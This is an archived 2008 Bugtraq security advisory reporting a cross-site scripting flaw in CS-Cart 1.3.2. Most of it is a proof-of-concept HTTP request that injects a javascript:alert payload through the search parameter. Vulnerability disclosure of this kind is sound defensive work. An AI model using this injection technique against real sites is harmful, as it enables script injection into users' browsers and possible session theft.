lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20080319183305.14057.qmail@securityfocus.com> Date: 19 Mar 2008 18:33:05 -0000 From: swhite@...urestate.com To: bugtraq@...urityfocus.com Subject: CS-Cart XSS CS-Cart XSS Discovered by sasquatch of SecureState - www.securestate.com Version: 1.3.2 obtained from /cscart/install.php GET /cscart/index.php?target=products&mode=search&subcats=Y&type=extended&avail=Y&pshor=Y&pfull=Y&pname=Y&cid=3&q=%22%20style%3D%22background:url(javascript:alert(12345))%22%20OA%3D%22&.x=0&.y=0 HTTP/1.0 Cookie: cart_languageC=EN; csid= Accept: */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: 192.168.1.1 Referer: http://192.168.1.1/cscart/ Related: http://forum.cs-cart.com/showthread.php?t=2948 http://www.power4security.com/isi/en/fiche/21370/CS-Cart+index.php+Multiple+Variable+SQL+Injection.html